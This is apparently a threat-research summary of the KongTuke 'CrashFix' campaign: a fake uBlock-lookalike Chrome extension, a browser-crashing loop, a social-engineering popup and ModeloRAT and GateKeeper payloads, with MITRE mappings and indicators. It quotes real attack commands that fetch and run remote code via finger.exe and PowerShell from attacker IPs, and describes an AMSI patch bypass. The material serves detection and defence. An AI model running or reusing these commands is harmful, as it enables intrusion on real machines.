Threat Research

Dissecting CrashFix: KongTuke’s New Toy

Huntress
Dissecting CrashFix: KongTuke’s New Toy

KongTuke distributed a malicious Chrome extension (NexShield, typosquatting uBlock Origin Lite) that tracks installs via UUID beacons, delays execution, and triggers a browser denial-of-service while displaying a fake “CrashFix” popup to socially engineer victims. The campaign delivers a multi-stage infection chain—using finger.exe as a LOLBin, multi-layer PowerShell obfuscation and DGA domains, and culminating in ModeloRAT and a GateKeeper .NET payload with AES+XOR string encryption. #KongTuke #ModeloRAT

Keypoints

  • NexShield is a typosquatting malicious Chrome extension that closely copies uBlock Origin Lite but replaces telemetry with attacker-controlled nexsnield[.]com and tracks users via UUID beacons during install, update, and uninstall.
  • The extension delays malicious activity (60 minutes) using Chrome Alarms and then repeatedly executes a DoS payload that creates massive chrome.runtime port connections, exhausting browser resources and causing crashes.
  • After forcing a browser crash, the extension shows a fake “CrashFix” popup with anti-analysis controls (blocks DevTools, right-click, text selection) to socially engineer victims into follow-up actions that deliver further payloads.
  • KongTuke’s post-exploitation chain uses finger.exe as a LOLBin to fetch obfuscated PowerShell, which deobfuscates additional stages, downloads secondary payloads, and profiles the host (VM vs physical, domain-joined) before delivering final payloads.
  • Domain-joined hosts receive ModeloRAT: a Python RAT with RC4-encrypted C2, registry persistence using HKCU Run keys, adaptive beaconing, file drop/randomized names, and hidden subprocess execution; non-domain hosts follow a heavily-obfuscated PowerShell path with DGA-driven staging.
  • GateKeeper .NET payload employs two-layer string encryption (AES-256-CBC then XOR), extensive anti-analysis fingerprinting, and fileless .NET payload loading via in-memory decompression and reflection.
  • Notable IOCs include NexShield extension ID, nexsnield[.]com telemetry domains, C2 IPs (including 199.217.98[.]108), multiple SHA256 hashes for payloads, a Dropbox link hosting ModeloRAT, and a developer email used in Chrome Store metadata.

MITRE Techniques

  • [T1499 ] Endpoint Denial of Service – The extension implements a resource-exhausting loop creating chrome.runtime ports to crash the browser: ‘makeBatch() function attempts to iterate 1 billion times (1e9), with each iteration creating a new chrome.runtime port connection.’
  • [T1204.001 ] User Execution (Social Engineering) – Uses a fake “CrashFix” popup and social-engineering to trick users after crashing the browser: ‘fake “CrashFix” security warning’.
  • [T1071.001 ] Application Layer Protocol: Web Protocols – C2 and telemetry use HTTP(S) web protocols for beacons and payload fetches: ‘hxxps://nexsnield[.]com/install?uuid=550e8400-e29b-41d4-a716-446655440000&version=2025.1116.1842’.
  • [T1218 ] Signed Binary Proxy Execution (LOLBin) – Abuses the legitimate Windows utility finger.exe to fetch and execute remote payloads: ‘copy %windir%system32finger.exe %temp%ct.exe&%temp%ct.exe [email protected][.]108|cmd’.
  • [T1059.001 ] Command and Scripting Interpreter: PowerShell – Multiple stages use PowerShell for deobfuscation, download, and execution (Invoke-WebRequest and iex): ‘Invoke-WebRequest -Uri “hxxp://199.217.98[.]108/b” -OutFile “$env:APPDATAscript.ps1” & “$env:APPDATAscript.ps1″Remove-Item “$env:APPDATAscript.ps1″‘.
  • [T1059.003 ] Command and Scripting Interpreter: Windows Command Shell – Uses cmd to run copy and piped remote execution: ‘cmd /c start “” /min cmd /c “copy %windir%system32finger.exe %temp%ct.exe&%temp%ct.exe [email protected][.]108|cmd”‘.
  • [T1105 ] Ingress Tool Transfer – Downloads secondary payloads and executables over HTTP to disk (AppData/Temp): ‘downloads a secondary payload from the attacker’s server, saves it to the user’s AppData directory as script.ps1’.
  • [T1547.001 ] Registry Run Keys / Startup Folder – ModeloRAT achieves persistence by writing to HKCU Run key ‘HKCUSoftwareMicrosoftWindowsCurrentVersionRunMonitoringService’.
  • [T1027 ] Obfuscated Files or Information – Extensive multi-layer obfuscation (ROT, Base64, XOR, AES) and string concatenation to hide IOCs: ‘multiple layers of Base64 encoding and XOR operations’.
  • [T1497 ] Virtualization/Sandbox Detection – Fingerprinting checks distinguish VMs from real hosts and gate payload delivery based on a numeric fingerprint: ‘a legitimate victim machine would generate a fingerprint around 164 billion, while a VMware sandbox would produce approximately 88 billion’.
  • [T1562.001 ] Impair Defenses: Disable or Modify Security Tools – AMSI bypass is performed by patching AmsiScanBuffer to immediately return, preventing script scanning: ‘overwrites it with 0xC3, a single RET instruction’.

Indicators of Compromise

  • [Domain ] extension telemetry and C2 – nexsnield[.]com (primary telemetry/C2), fyvw2oiv[.]top (stage fetch), and other weekly DGA .top domains.
  • [IP address ] C2 and payload hosts – 199.217.98[.]108 (hosts finger.exe and initial payloads), 170.168.103[.]208 and 158.247.252[.]178 (ModeloRAT C2 IPs).
  • [Extension ID ] malicious Chrome extension identifier – cpcdkmjddocikjdkbbeiaafnpdbdafmi (NexShield extension ID).
  • [File URLs ] payload download endpoints – hxxp://temp[.]sh/utDKu/138d2a62b73e89fc4d09416bcefed27e139ae90016ba4493efc5fbf43b66acfa.exe (aa.exe download), hxxps://nexsnield[.]com/install?… (install beacon URL).
  • [File hashes ] known payload hashes – SHA256:fbfce492d1aa458c0ccc8ce4611f0e2d00913c8d51b5016ce60a7f59db67de67 (aa.exe core payload), SHA256:6399c686eba09584bbbb02f31d398ace333a2b57529059849ef97ce7c27752f4 (core extension background.js).
  • [Registry key ] persistence – HKCUSoftwareMicrosoftWindowsCurrentVersionRunMonitoringService (ModeloRAT persistence entry name pattern examples like Spotify47/Adobe2841 noted as mimicry).
  • [Files / Paths ] local artifact examples – %TEMP%aa.exe, $env:APPDATAscript.ps1, CPCDKMJDDOCIKJDKBBEIAAFNPDBDAFMI_2025_1116_1842_0.crx (Chrome extension file).
  • [Dropbox link ] staging / payload hosting – https://www.dropbox[.]com/scl/fi/6gscgf35byvflw4y6x4i0/b1.zip?rlkey=bk2hvxvw53ggzhbjiftppej50&st=yyxnfu71&dl=1 (ModeloRAT hosting; SHA256:c15f44d6abb3a2a882ffdc9b90f7bb5d1a233c0aa183eb765aa8bfba5832c8c6).
  • [Developer metadata ] Chrome Store developer contact – [email protected] (registered email shown in extension metadata).

Read more: https://www.huntress.com/blog/malicious-browser-extention-crashfix-kongtuke